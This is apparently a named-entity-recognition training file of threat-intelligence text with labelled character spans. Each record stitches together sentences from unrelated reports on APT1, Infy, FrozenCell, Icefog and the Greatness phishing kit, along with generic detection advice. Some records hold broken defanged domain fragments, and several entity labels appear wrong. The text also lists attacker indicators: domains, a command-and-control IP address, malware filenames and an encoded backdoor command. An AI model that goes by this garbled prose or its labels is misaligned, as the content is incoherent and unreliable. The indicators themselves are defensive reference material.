{"text": "The PDF lists dates of birth , gender , passport numbers , and names . We will detail how the C&C infrastructure and tools used by hacker group Hidden Lynx during its VOHO campaign ( 2012 ) , excellently documented by Symantec researchers last September , overlap with tools used in other high profile operations during the past few years . The sheer number of APT1 IP addresses concentrated in these Shanghai ranges , coupled with Simplified Chinese keyboard layout settings on APT1 \u2019s attack systems , betrays the true location and language of the operators . Ransomware - as - a - service is a relatively new version of these commodity groups , such as DarkSide , known for the cyber attack in 2021 that disrupted the Colonial oil pipeline and made gas more expensive for thousands of U.S. consumers .", "spans": [{"start": 144, "end": 155, "label": "Organization"}, {"start": 218, "end": 226, "label": "Organization"}, {"start": 361, "end": 365, "label": "Organization"}, {"start": 432, "end": 459, "label": "System"}, {"start": 479, "end": 483, "label": "Organization"}, {"start": 562, "end": 591, "label": "Organization"}, {"start": 656, "end": 664, "label": "Organization"}]}
{"text": "Potential targets The actors behind FrozenCell used an online service that geolocates mobile devices based on nearby cell towers to track targets . When the New York Times and Mandiant last year unmasked a large scale Chinese hacking operation , pinpointing its location down to the building , the report drew mainstream attention to what security professionals already well knew : sophisticated threat actors carry out persistent cyber operations over months and years . To help manage the vast number of systems they control , APT1 has registered hundreds of domain names , the majority of which also point to a Shanghai locale . But other bad actors have since adopted this businesses model , offering every from command and control servers to phishing bots - as - a - service .", "spans": [{"start": 36, "end": 46, "label": "Malware"}, {"start": 157, "end": 171, "label": "Organization"}, {"start": 176, "end": 184, "label": "Organization"}, {"start": 529, "end": 533, "label": "Organization"}, {"start": 642, "end": 652, "label": "Organization"}, {"start": 716, "end": 743, "label": "System"}, {"start": 747, "end": 779, "label": "Organization"}]}
{"text": "This data shows a distinct concentration of infected devices beaconing from Gaza , Palestine . By the end of April , GozNym had redirection instructions for 17 Polish banks in its repertoire , along with an extra 230 URLs designed to assist attackers in targeting community banks and email service providers in the Eastern European country . The domain names and IP addresses together comprise APT1 \u2019s command and control framework which they manage in concert to camouflage their true origin from their English speaking targets . There are a few reasons why attackers may opt to pay for an as - a - service malware tool for their chosen campaign : \u2022 As - a - service saves attackers time .", "spans": [{"start": 117, "end": 123, "label": "System"}, {"start": 167, "end": 172, "label": "Organization"}, {"start": 264, "end": 279, "label": "Organization"}, {"start": 284, "end": 307, "label": "Organization"}, {"start": 394, "end": 398, "label": "Organization"}, {"start": 402, "end": 421, "label": "System"}, {"start": 559, "end": 568, "label": "Organization"}, {"start": 588, "end": 620, "label": "System"}, {"start": 638, "end": 646, "label": "Organization"}]}
{"text": "Map of potential targets Early samples of FrozenCell used an online service for storing geolocation information of infected devices . Using Recorded Future , we quickly built a timeline of the reported use of those tools in major security incidents , finding many events prior to the early 2013 expos\u00e9 on Hidden Lynx . As covered in the previous \u201c Attack Lifecycle \u201d section , WEBC2 backdoor variants download and interpret data stored between tags in HTML pages as commands . When they pay for someone else \u2019s malware kit , whether it be ransomware or a phishing bot , they do n\u2019t have to invest time , money or labor to write their own malicious code or tools and instead can hop right into deploying the malware .", "spans": [{"start": 42, "end": 52, "label": "Malware"}, {"start": 305, "end": 316, "label": "Organization"}, {"start": 377, "end": 391, "label": "Malware"}, {"start": 452, "end": 456, "label": "System"}]}
{"text": "Analysis of this telemetry shows infected devices are completely based in Gaza , Palestine . In particular , FireEye during the fall of 2013 called out infrastructure overlap between Ephemeral Hydra and DeputyDog . They usually download HTML pages from a system within APT1 \u2019s hop infrastructure . For the actors and groups who originally created the malware , it is a more reliable income stream for them .", "spans": [{"start": 109, "end": 116, "label": "Organization"}, {"start": 203, "end": 212, "label": "System"}, {"start": 237, "end": 241, "label": "System"}, {"start": 269, "end": 273, "label": "Organization"}, {"start": 306, "end": 312, "label": "Organization"}]}
{"text": "It has not been confirmed whether these are from test devices or the devices of victims . The above network shows relationships between three tools used by Hidden Lynx during its VOHO campaign : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit . We have observed APT1 intruders logging in to WEBC2 servers and manually editing the HTML pages that backdoors will download . Usually , they \u2019d have to hope a successful attack leads to a ransom payment or some sort of other financial windfall .", "spans": [{"start": 195, "end": 206, "label": "System"}, {"start": 209, "end": 225, "label": "Malware"}, {"start": 232, "end": 246, "label": "System"}, {"start": 266, "end": 270, "label": "Organization"}, {"start": 295, "end": 300, "label": "Malware"}, {"start": 334, "end": 338, "label": "System"}]}
{"text": "We were also able to link the FrozenCell 's Android infrastructure to numerous desktop samples that are part of the larger multi-platform attack . Symantec during 2012 linked the Elderwood Project to Operation Aurora ; Trojan.Naid and Backdoor.Moudoor were also used in Aurora , by the Elderwood Gang , and by Hidden Lynx . Because the commands are usually encoded and difficult to spell from memory , APT1 intruders typically do not type these strings , but instead copy and paste them into the HTML files . Instead , they can make money by marketing their services to other bad actors for a fee .", "spans": [{"start": 30, "end": 40, "label": "Malware"}, {"start": 44, "end": 51, "label": "System"}, {"start": 147, "end": 155, "label": "Organization"}, {"start": 219, "end": 230, "label": "System"}, {"start": 235, "end": 251, "label": "Malware"}, {"start": 270, "end": 276, "label": "System"}, {"start": 286, "end": 300, "label": "Organization"}, {"start": 310, "end": 321, "label": "Organization"}, {"start": 402, "end": 406, "label": "Organization"}, {"start": 496, "end": 500, "label": "System"}]}
{"text": "It appears the attackers sent malicious executables though phishing campaigns impersonating individuals associated with the Palestinian Security Services , the General Directorate of Civil Defence - Ministry of the Interior , and the 7th Fateh Conference of the Palestinian National Liberation Front ( held in late 2016 ) . In addition to these , we also identified \" Macfog \" , a native Mac OS X implementation of Icefog that infected several hundred victims worldwide . They likely generate the encoded commands on their own systems before pasting them in to an HTML file hosted by the hop point . \u2022 Bad actors who want to get into the cyber attack business need little to no technical skills to get started .", "spans": [{"start": 124, "end": 153, "label": "Organization"}, {"start": 160, "end": 196, "label": "Organization"}, {"start": 199, "end": 223, "label": "Organization"}, {"start": 262, "end": 299, "label": "Organization"}, {"start": 368, "end": 374, "label": "System"}, {"start": 381, "end": 411, "label": "System"}, {"start": 415, "end": 421, "label": "System"}, {"start": 564, "end": 568, "label": "System"}, {"start": 602, "end": 612, "label": "Organization"}]}
{"text": "The titles and contents of these files suggest that the actor targeted individuals affiliated with these government agencies and the Fatah political party . Icefog , also known as the \" Dagger Panda \" by Crowdstrike 's naming convention , infected targets mainly in South Korea and Japan . For example , we observed an APT attacker pasting the string \u201c czo1NA== \u201d into an HTML page . When an attacker pays for an as - a - service malware , they often get an individual login with dedicated customer support , much like any user would with a legitimate piece of software .", "spans": [{"start": 133, "end": 138, "label": "Organization"}, {"start": 157, "end": 163, "label": "Organization"}, {"start": 186, "end": 198, "label": "Organization"}, {"start": 204, "end": 215, "label": "Organization"}, {"start": 372, "end": 376, "label": "System"}, {"start": 392, "end": 400, "label": "Organization"}, {"start": 413, "end": 437, "label": "Malware"}]}
{"text": "Some malicious files associated with these samples were titled the following : Council_of_ministres_decision Minutes of the Geneva Meeting on Troops Summary of today 's meetings.doc.exe The most important points of meeting the memory of the late President Abu Omar may Allah have mercy on him - Paper No . In 2013 , a public report reveals a group of actors conducted targeted attacks leverage a malware dubbed ICEFOG against mainly government organizations and defense industry of South Korea and Japan . That string is the base64 encoded version of \u201c s : 54 \u201d , meaning \u201c sleep for 54 minutes \u201d ( or hours , depending on the particular backdoor ) . As Nick Biasini explained in a past episode of Talos Takes , name recognition also plays a major part in the rising popularity of this business model .", "spans": [{"start": 169, "end": 185, "label": "Indicator"}, {"start": 411, "end": 417, "label": "System"}, {"start": 433, "end": 457, "label": "Organization"}, {"start": 462, "end": 478, "label": "Organization"}, {"start": 654, "end": 666, "label": "Organization"}, {"start": 698, "end": 709, "label": "Organization"}]}
{"text": "1 Fadi Alsalamin scandal with an Israeli officer - exclusive - watched before the deletion - Fadi Elsalameen The details of the assassination of President Arafat_06-12-2016_docx Quds.rar Many of these executables are associated with various short links created using Bit.ly , a URL shortening service . Similar to our approach with Symantec 's report on Hidden Lynx , we used Recorded Future to organize the technical details about the DeputyDog attacks to reveal technical information described in the open source reporting across multiple campaigns . In lieu of manually editing an HTML file on a hop point , we have also observed APT1 intruders uploading new ( already-edited ) HTML files . Lesser - known threat actors want to piggyback off having a big name associated with them , like DarkSide , to intimidate their actors or lend more credence to the effectiveness of their threats .", "spans": [{"start": 178, "end": 186, "label": "Indicator"}, {"start": 267, "end": 273, "label": "System"}, {"start": 332, "end": 340, "label": "Organization"}, {"start": 584, "end": 588, "label": "System"}, {"start": 633, "end": 637, "label": "Organization"}, {"start": 681, "end": 685, "label": "System"}, {"start": 694, "end": 722, "label": "Organization"}, {"start": 791, "end": 799, "label": "Malware"}]}
{"text": "After analyzing the traffic associated with these short links , we determined that each one was associated with a referral path from mail.mosa.pna.ps . With Javafog , we are turning yet another page in the Icefog story by discovering another generation of backdoors used by the attackers . When APT1 attackers are not using WEBC2 , they require a \u201c command and control \u201d ( C2 ) user interface so they can issue commands to the backdoor . Cisco Talos researchers recently discovered Greatness , one of the most advanced phishing - as - a - service tools ever seen in the wild .", "spans": [{"start": 133, "end": 149, "label": "Indicator"}, {"start": 206, "end": 212, "label": "System"}, {"start": 295, "end": 299, "label": "Organization"}, {"start": 324, "end": 329, "label": "Malware"}, {"start": 349, "end": 368, "label": "System"}, {"start": 373, "end": 375, "label": "System"}, {"start": 438, "end": 461, "label": "Organization"}, {"start": 482, "end": 491, "label": "System"}, {"start": 519, "end": 552, "label": "Organization"}]}
{"text": "MOSA is the Palestinian Directorate of Social Development whose mandate is to achieve comprehensive development , social security , and economic growth for Palestinian families , according to publicly available information on this ministry . Since January 2013 , we've been on the lookout for a possible RedOctober comeback . This interface sometimes runs on their personal attack system , which is typically in Shanghai . Our analysis indicates that attackers may have been using attackers since mid-2022 .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 304, "end": 314, "label": "Organization"}, {"start": 451, "end": 460, "label": "Organization"}]}
{"text": "Infrastructure At the time of writing the following domains have either been used by this family or are currently active . One possible hit was triggered when we observed Mevade , an unusual piece of malware that appeared late in 2013 . In these instances , when a victim backdoor makes contact with a hop , the communications need to be forwarded from the hop to the intruder \u2019s Shanghai system so the backdoor can talk to the C2 server software . Greatness offers the ability for users to bypass targets \u2019 multi - factor authentication protections , IP filtering and integration with Telegram bots .", "spans": [{"start": 428, "end": 430, "label": "System"}, {"start": 449, "end": 458, "label": "System"}]}
{"text": "We expect this list to grow given that this actor has changed its infrastructure numerous times in 2017 . In August 2014 , some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware . We have observed 767 separate instances in which APT1 intruders used the publicly available \u201c HUC Packet Transmit Tool \u201d or HTRAN on a hop . Greatness incorporates features seen in some of the most advanced PaaS offerings , such as multi - factor authentication ( MFA ) bypass , IP filtering and integration with Telegram bots .", "spans": [{"start": 187, "end": 200, "label": "Vulnerability"}, {"start": 282, "end": 286, "label": "Organization"}, {"start": 327, "end": 351, "label": "System"}, {"start": 357, "end": 362, "label": "System"}, {"start": 374, "end": 383, "label": "System"}, {"start": 512, "end": 524, "label": "System"}, {"start": 546, "end": 559, "label": "System"}]}
{"text": "cecilia-gilbert [ . It wasn't until August 2014 that we observed something which made us wonder if RedOctober is back for good . As always , keep in mind that these uses are confirmed uses , and likely represent only a small fraction of APT1 \u2019s total activity . Greatness , for now , is only focused on Microsoft 365 phishing pages , providing its affiliates with an attachment and link builder that creates highly convincing decoy and login pages .", "spans": [{"start": 0, "end": 19, "label": "Indicator"}, {"start": 237, "end": 241, "label": "Organization"}, {"start": 262, "end": 271, "label": "Organization"}, {"start": 303, "end": 331, "label": "Organization"}]}
{"text": "] comgooogel [ . The Cloud Atlas implants utilize a rather unusual C&C mechanism . The HTRAN utility is merely a middle-man , facilitating connections between the victim and the attacker who is using the hop point . It contains features such as having the victim \u2019s email address pre - filled and displaying their appropriate company logo and background image , extracted from the target organization \u2019s real Microsoft 365 login page .", "spans": [{"start": 13, "end": 16, "label": "Indicator"}, {"start": 87, "end": 92, "label": "System"}]}
{"text": "] orgmary-crawley [ . We named it RedOctober because we started this investigation in October 2012 , an unusually hot month . Typical use of HTRAN is fairly simple : the attacker must specify the originating IP address ( of his or her workstation in Shanghai ) , and a port on which to accept connections . This makes Greatness particularly well - suited for phishing business users .", "spans": [{"start": 18, "end": 21, "label": "Indicator"}, {"start": 141, "end": 146, "label": "System"}, {"start": 318, "end": 327, "label": "Organization"}, {"start": 359, "end": 382, "label": "Organization"}]}
{"text": "] commydriveweb [ . The attackers upload data to the account , which is downloaded by the implant , decrypted and interpreted . For example , the following command , which was issued by an APT1 actor , will listen for incoming connections on port 443 on the hop and automatically proxy them to the Shanghai IP address 58.247.242.254 on port 443 . Any Greatness affiliates do n\u2019t need a specific set of skills .", "spans": [{"start": 16, "end": 19, "label": "Indicator"}, {"start": 189, "end": 193, "label": "Organization"}, {"start": 318, "end": 332, "label": "Indicator"}, {"start": 351, "end": 360, "label": "Organization"}]}
{"text": "] comrose-sturat [ . Just like with RedOctober , the top target of Cloud Atlas is Russia , followed closely by Kazakhstan , according to data from the Kaspersky Security Network ( KSN ) . Occasionally , APT1 attackers have installed C2 server components on systems in their hop infrastructure rather than forwarding connections back to C2 servers in Shanghai . All they need to do is deploy and configure the provided phishing kit with an API key .", "spans": [{"start": 17, "end": 20, "label": "Indicator"}, {"start": 36, "end": 46, "label": "Organization"}, {"start": 151, "end": 177, "label": "Organization"}, {"start": 180, "end": 183, "label": "Organization"}, {"start": 203, "end": 207, "label": "Organization"}, {"start": 233, "end": 235, "label": "System"}, {"start": 336, "end": 338, "label": "System"}]}
{"text": "] infokalisi [ . In May 2015 , Palo Alto Networks WildFire detected two e-mails carrying malicious documents from a genuine and compromised Israeli Gmail account , sent to an Israeli industrial organization . In these instances they do not need to use a proxy tool like HTRAN to interact with victim systems . If used successfully , the attacker can set up a proxy Microsoft 365 authentication system and steal a victim \u2019s authentication credentials or cookies with a \u201c man - in - the - middle \" attack .", "spans": [{"start": 13, "end": 16, "label": "Indicator"}, {"start": 31, "end": 58, "label": "Organization"}, {"start": 183, "end": 206, "label": "Organization"}, {"start": 270, "end": 275, "label": "System"}, {"start": 333, "end": 345, "label": "Organization"}]}
{"text": "] xyzdebra-morgan [ . One e-mail carried a Microsoft PowerPoint file named \" thanks.pps \" ( VirusTotal ) , the other a Microsoft Word document named \" request.docx \" . However , it does mean that the intruders need to be able to interface with the ( often graphical ) C2 server software running on the hop . Greatness is specifically designed to work in a standardized way so that the experience is the same for each customer who buys into the service , potentially allowing anyone with a moderate amount of technical ability to carry out advanced , convincing phishing attacks .", "spans": [{"start": 18, "end": 21, "label": "Indicator"}, {"start": 43, "end": 68, "label": "Malware"}, {"start": 77, "end": 87, "label": "Malware"}, {"start": 119, "end": 142, "label": "Malware"}, {"start": 151, "end": 163, "label": "Malware"}, {"start": 268, "end": 270, "label": "System"}, {"start": 308, "end": 317, "label": "Organization"}, {"start": 539, "end": 577, "label": "Organization"}]}
{"text": "] comarnani [ . Around the same time , WildFire also captured an e-mail containing a Word document ( \" hello.docx \" ) with an identical hash as the earlier Word document , this time sent to a U.S. Government recipient . We have observed APT1 intruders log in to their hop point , start the C2 server , wait for incoming connections , and then proceed to give commands to victim systems . Since as - a - service or commodity malware can include all types of malware , it can be tough to provide specific advice for detection and prevention .", "spans": [{"start": 12, "end": 15, "label": "Indicator"}, {"start": 39, "end": 47, "label": "Organization"}, {"start": 85, "end": 98, "label": "Malware"}, {"start": 103, "end": 113, "label": "Malware"}, {"start": 156, "end": 169, "label": "Malware"}, {"start": 237, "end": 241, "label": "Organization"}, {"start": 290, "end": 292, "label": "System"}, {"start": 414, "end": 431, "label": "Malware"}]}
{"text": "] infoacount-manager [ . Attacks using this tool were still active as of April 2016 . WEBC2 variants may include a server component that provides a simple C2 interface to the intruder . For Greatness specifically , anyone implementing multi - factor authentication should opt for code - based authentication through their MFA app of choice , such as Cisco Duo , rather than the easier - to - break method of a simple \u201c yes \u201d or \u201c no \u201d push notification .", "spans": [{"start": 21, "end": 24, "label": "Indicator"}, {"start": 86, "end": 91, "label": "Malware"}, {"start": 155, "end": 157, "label": "System"}, {"start": 190, "end": 199, "label": "Organization"}, {"start": 350, "end": 359, "label": "System"}]}
{"text": "] infogooogel-drive [ . Considering the language being used in the malicious code is Arabic , it seems that the attacker is familiar with Arabic language as well . This saves the intruder from having to manually edit webpages . Adversaries may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 20, "end": 23, "label": "Indicator"}, {"start": 228, "end": 239, "label": "Organization"}]}
{"text": "] commediauploader [ . The initially-observed \" thanks.pps \" example tricks the user into running the embedded file named ins8376.exe which loads a payload DLL named mpro324.dll . That is , this server component receives connections from victim backdoors , displays them to the intruder , and then translates the intruder \u2019s commands into HTML tags that the victim backdoors read . Operating systems may have features to hide various artifacts , such as important system files and administrative task execution , to avoid disrupting user work environments and prevent users from changing files or features on the system .", "spans": [{"start": 19, "end": 22, "label": "Indicator"}, {"start": 48, "end": 58, "label": "Malware"}, {"start": 122, "end": 133, "label": "Malware"}, {"start": 166, "end": 177, "label": "Malware"}, {"start": 339, "end": 343, "label": "System"}, {"start": 382, "end": 399, "label": "System"}, {"start": 464, "end": 476, "label": "System"}]}
{"text": "] meacount-manager [ . In this case , the file used the software name \" Cyberlink \" , and a description of \" CLMediaLibrary Dynamic Link Library \" and listing version 4.19.9.98 . In the last two years alone , we have confirmed 937 APT1 C2 servers \u2014 that is , actively listening or communicating programs \u2014 running on 849 distinct IP addresses . Adversaries may abuse these features to hide artifacts such as files , directories , user accounts , or other system activity to evade detection.[1][2][3 ]", "spans": [{"start": 19, "end": 22, "label": "Indicator"}, {"start": 72, "end": 81, "label": "Malware"}, {"start": 231, "end": 235, "label": "Organization"}, {"start": 236, "end": 238, "label": "System"}, {"start": 345, "end": 356, "label": "Organization"}]}
{"text": "] netupload404 [ . Unit 42 published a blog at the beginning of May titled \" Prince of Persia \" , in which we described the discovery of a decade-long campaign using a formerly unknown malware family , Infy , that targeted government and industry interests worldwide . However , we have evidence to suggest that APT1 is running hundreds , and likely thousands , of other servers ( see the Domains section below ) . Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation , such as through the use of virtualization technology.[4 ] Bundlore uses the mktemp utility to make unique file and directory names for payloads , such as TMP_DIR=`mktemp", "spans": [{"start": 15, "end": 18, "label": "Indicator"}, {"start": 19, "end": 26, "label": "Organization"}, {"start": 202, "end": 206, "label": "System"}, {"start": 223, "end": 233, "label": "Organization"}, {"start": 238, "end": 246, "label": "Organization"}, {"start": 312, "end": 316, "label": "Organization"}, {"start": 415, "end": 426, "label": "Organization"}, {"start": 642, "end": 650, "label": "Malware"}, {"start": 660, "end": 674, "label": "System"}]}
{"text": "] clubupload999 [ . We noted in our original blog the large amount of targeting of Iranian citizens in this campaign , we observed almost one-third of all victims to be Iranian . The programs acting as APT1 servers have mainly been : FTP , for transferring files ; web , primarily for WEBC2 ; RDP , for remote graphical control of a system ; HTRAN , for proxying ; and C2 servers associated with various backdoor families . DarkTortilla has used % HiddenReg%", "spans": [{"start": 16, "end": 19, "label": "Indicator"}, {"start": 91, "end": 99, "label": "Organization"}, {"start": 202, "end": 206, "label": "Organization"}, {"start": 234, "end": 237, "label": "Indicator"}, {"start": 285, "end": 290, "label": "Malware"}, {"start": 293, "end": 296, "label": "Indicator"}, {"start": 342, "end": 347, "label": "System"}, {"start": 369, "end": 371, "label": "System"}, {"start": 424, "end": 436, "label": "Malware"}]}
{"text": "] infoal-amalhumandevelopment [ . In addition to the original \" Infy \" variant , we also see the newer , more sophisticated , interactive , and fuller-featured \" Infy M \" variant deployed against apparently-higher-value targets . The Domain Name System ( DNS ) is the phone book of the Internet . and % HiddenKey% as part of its persistence via the Windows registry.[6 ] OSX / Shlayer has used the mktemp utility to make random and unique filenames for payloads , such as export tmpDir=\"$(mktemp -d /tmp / XXXXXXXXXXXX ) \" or mktemp -t Installer .", "spans": [{"start": 30, "end": 33, "label": "Indicator"}, {"start": 64, "end": 68, "label": "System"}, {"start": 162, "end": 168, "label": "System"}, {"start": 234, "end": 252, "label": "Indicator"}, {"start": 255, "end": 258, "label": "Indicator"}, {"start": 371, "end": 384, "label": "System"}, {"start": 472, "end": 518, "label": "Indicator"}]}
{"text": "] commargaery [ . This documentation provides new insight into intrusion efforts conducted by at least four discrete Iranian threat actors , Rocket Kitten , Infy , Sima , and Operation Cleaver , including groups and tools that have not been previously disclosed . In the same way that people program named contacts into their cell phones and no longer need to remember phone numbers , DNS allows people to remember names like \u201c google.com \u201d instead of IP addresses . Tarrask is able to create \" hidden \" scheduled tasks by deleting the Security Descriptor ( SD ) registry value.[9 ] WarzoneRAT can masquerade the Process Environment Block on a compromised host to hide it 's attempts to elevate privileges through IFileOperation .", "spans": [{"start": 14, "end": 17, "label": "Indicator"}, {"start": 141, "end": 154, "label": "Organization"}, {"start": 157, "end": 161, "label": "Organization"}, {"start": 164, "end": 168, "label": "Organization"}, {"start": 385, "end": 388, "label": "Indicator"}, {"start": 428, "end": 438, "label": "Indicator"}, {"start": 467, "end": 474, "label": "System"}, {"start": 583, "end": 593, "label": "Malware"}]}
{"text": "] coupload202 [ . Since early 2013 , we have observed activity from a unique threat actor group , which we began to investigate based on increased activities against human right activists in the beginning of 2015 . When a person types \u201c google.com \u201d into a web browser , a DNS translation to an IP address occurs so that the person \u2019s computer can communicate with Google . This type of attack technique can not be easily mitigated with preventive controls since it is based on the abuse of system features .", "spans": [{"start": 14, "end": 17, "label": "Indicator"}, {"start": 178, "end": 187, "label": "Organization"}, {"start": 237, "end": 247, "label": "Indicator"}, {"start": 273, "end": 276, "label": "Indicator"}, {"start": 365, "end": 371, "label": "Organization"}]}
{"text": "] comgo-mail-accounts [ . Over the course of three years of observation of campaigns targeting civil society and human rights organizations , from records of well over two hundred spearphishing and other intrusion attempts against individuals inside of Iran and in the diaspora , a narrative of persistent intrusion efforts emerges . Names that can be translated through DNS to IP addresses are referred to as Fully Qualified Domain Names ( FQDNs ) . for third - party application logging , messaging , and/or other artifacts that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 22, "end": 25, "label": "Indicator"}, {"start": 95, "end": 108, "label": "Organization"}, {"start": 113, "end": 139, "label": "Organization"}, {"start": 269, "end": 277, "label": "Organization"}, {"start": 371, "end": 374, "label": "Indicator"}, {"start": 410, "end": 438, "label": "System"}, {"start": 441, "end": 446, "label": "System"}]}
{"text": "] comupload101 [ . Thanks to information we have been able to collect during the course of our research , such as characteristics of the group 's malware and development cycle , our research strongly supports the claim that the Infy group is of Iranian origin and potentially connected to the Iranian state . A DNS zone represents a collection of FQDNs that end with the same name , and which are usually registered through a domain registration company and controlled by a single owner . Monitor executed commands and arguments that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 15, "end": 18, "label": "Indicator"}, {"start": 228, "end": 232, "label": "Organization"}, {"start": 311, "end": 314, "label": "Indicator"}, {"start": 347, "end": 352, "label": "System"}]}
{"text": "] netsybil-parks [ . Amongst a backdrop of other incidents , Infy became one of the most frequently observed agents for attempted malware attacks against Iranian civil society beginning in late 2014 , growing in use up to the February 2016 parliamentary election in Iran . For example , \u201c hugesoft.org \u201d is an FQDN but also represents a zone . Monitor for newly constructed files that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 162, "end": 175, "label": "Organization"}, {"start": 289, "end": 301, "label": "Indicator"}, {"start": 310, "end": 314, "label": "System"}]}
{"text": "] infodavos-seaworth [ . Until the publication of the Palo Alto report , the developers of the Infy appeared to be actively updating and maintaining the codebase , and new releases were distributed to existing , as well as new , targets quite regularly . The FQDNs \u201c ug-co.hugesoft.org \u201d and \u201c 7cback.hugesoft.org \u201d are part of the \u201c hugesoft.org \u201d zone and are called \u201c subdomains \u201d of the zone . Monitor for contextual data about a file , which may include information such as name , the content ( ex : signature , headers , or data / media ) , user / ower , permissions that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 54, "end": 63, "label": "Organization"}, {"start": 95, "end": 99, "label": "System"}, {"start": 259, "end": 264, "label": "System"}, {"start": 267, "end": 285, "label": "Indicator"}, {"start": 294, "end": 313, "label": "Indicator"}, {"start": 334, "end": 346, "label": "Indicator"}]}
{"text": "] infoupload999 [ . Other samples were found bearing a compilation time as early as June 2012 and version 00002 . The person who registered \u201c hugesoft.org \u201d may add as many subdomains as they wish and controls the IP resolutions of these FQDNs . Monitor for changes made to files that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 142, "end": 154, "label": "Indicator"}, {"start": 238, "end": 243, "label": "System"}]}
{"text": "] orgacount-manager [ . Over the months following the elections , the accounts of Iranians that had been compromised by the actors were then used for spreading the malware . APT1 has registered at least 107 zones since 2004 . Monitor for changes made to firewall rules for unexpected modifications to allow / block specific network traffic that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 82, "end": 90, "label": "Organization"}, {"start": 174, "end": 178, "label": "Organization"}]}
{"text": "] comlila-tournai [ . When activities targeting of civil society subsided , the actors instead appeared to have focused on external targets , such a series of attempts to spearphish the Danish Ministry of Foreign Affairs . Within these zones , we know of thousands of FQDNs that have resolved to hundreds of IP addresses ( which we suspect are hops ) and in some instances to APT1 \u2019s source IP addresses in Shanghai . Monitor for API calls that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 51, "end": 64, "label": "Organization"}, {"start": 268, "end": 273, "label": "System"}, {"start": 376, "end": 380, "label": "Organization"}]}
{"text": "] comaccount-manager [ . Palo Alto Networks has noted and described the differences of two malware agents developed in parallel , with commonalities in behavior but differing functionalities ; families described as Infy and Infy M. Our primary observation was of the Infy ( non-M ) malware , which primarily functions as a keylogger for the collection of account credentials . The first zone we became aware of was \u201c hugesoft.org \u201d , which was registered through eNom , Inc. in October 2004 . Monitor newly executed processes that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 25, "end": 43, "label": "Organization"}, {"start": 215, "end": 219, "label": "System"}, {"start": 224, "end": 231, "label": "System"}, {"start": 267, "end": 271, "label": "System"}, {"start": 282, "end": 289, "label": "System"}, {"start": 323, "end": 332, "label": "System"}, {"start": 341, "end": 374, "label": "Malware"}, {"start": 417, "end": 429, "label": "Indicator"}]}
{"text": "] orgmediauploader [ . Our observation of Infy 's campaigns , primarily through the lens of spearphishing attacks against Iranian civil society and media organizations , indicates a wandering focus on particular demographics on a strategic basis over time . The registrant supplied \u201c uglygorilla@163.com \u201d as an email address . Monitor for any attempts to enable scripts running on a system would be considered suspicious .", "spans": [{"start": 130, "end": 143, "label": "Organization"}, {"start": 148, "end": 167, "label": "Organization"}, {"start": 284, "end": 303, "label": "Indicator"}, {"start": 312, "end": 317, "label": "System"}]}
{"text": "] infokalisi [ . The Infy malware was seen targeting Iranians again in June 2015 , when it was shared with researchers after being sent to a broadcast journalist at BBC Persian with a generic introduction and a PowerPoint presentation attached titled \" Nostalogy \" ( sic ) . The supplied registration information , which is still visible in public \u201c whois \u201d data as of February 3, 2013 . If scripts are not commonly used on a system , but enabled , scripts running out of cycle from patching or other administrator functions are suspicious .", "spans": [{"start": 21, "end": 33, "label": "System"}, {"start": 53, "end": 61, "label": "Organization"}, {"start": 141, "end": 161, "label": "Organization"}, {"start": 211, "end": 221, "label": "System"}, {"start": 350, "end": 355, "label": "System"}]}
{"text": "] orgaryastark [ . Based on information collected in the course of this research , the targets and victims of Infy 's campaigns have continued to be strongly aligned with Iran 's \" soft war \" agenda , internal security policies , and regional adversaries of the hardline establishment of the Islamic Republic of Iran . The supplied registrant information does not need to be accurate for the zone to be registered successfully . Scripts should be captured from the file system when possible to determine their actions and intent .", "spans": []}
{"text": "] infomavis-dracula [ . Until late December 2015 , in nearly every Infy message documented since our tracking began in May 2013 , no attempt included strong tailoring of the approach , often not even including an email body , instead relying on cryptic filenames and email subjects to attract interest . For example , \u201c shanghai \u201d is not a street name . Monitor for newly constructed services / daemons that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 67, "end": 79, "label": "System"}]}
{"text": "] comkalisi [ . One narrowly-targeted spearphishing from Infy was sent from the compromised account of a political activist promoting participation inside of Iran , claiming to be a set of images of a British-Iranian dual national that has been held in Evin Prison for five years on espionage charges . Nevertheless , it is noteworthy that Shanghai appeared in the first known APT1 domain registration , along with a phone number that begins with China \u2019s \u201c +86 \u201d international code . Monitor for newly constructed user accounts that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 105, "end": 123, "label": "Organization"}, {"start": 201, "end": 216, "label": "Organization"}, {"start": 377, "end": 381, "label": "Organization"}]}
{"text": "] infogoogle-support-team [ . As in the past , these messages have been sent accounts believed to be fake and accounts compromised by Infy , including Kurdish activists that had previously been compromised by the Flying Kitten actor group . In fact , Shanghai was listed as the registrant \u2019s city in at least 24 of the 107 ( 22% ) registrations . Monitor for contextual data about an account , which may include a username , user ID , environmental data that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 151, "end": 168, "label": "Organization"}, {"start": 213, "end": 238, "label": "Organization"}]}
{"text": "] com9oo91e [ . The actors successfully compromised a host of an Saudi government institutions on January 17 , 2016 , and maintained access for at least two weeks . Overall , the combination of a relatively high number of \u201c Shanghai \u201d registrations with obviously false registration examples in other registrations suggests a partially uncoordinated domain registration campaign from 2004 until present , in which some registrants tried to fabricate non-Shanghai locations but others did not . Monitor for changes made to windows registry keys and/or values that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 71, "end": 94, "label": "Organization"}]}
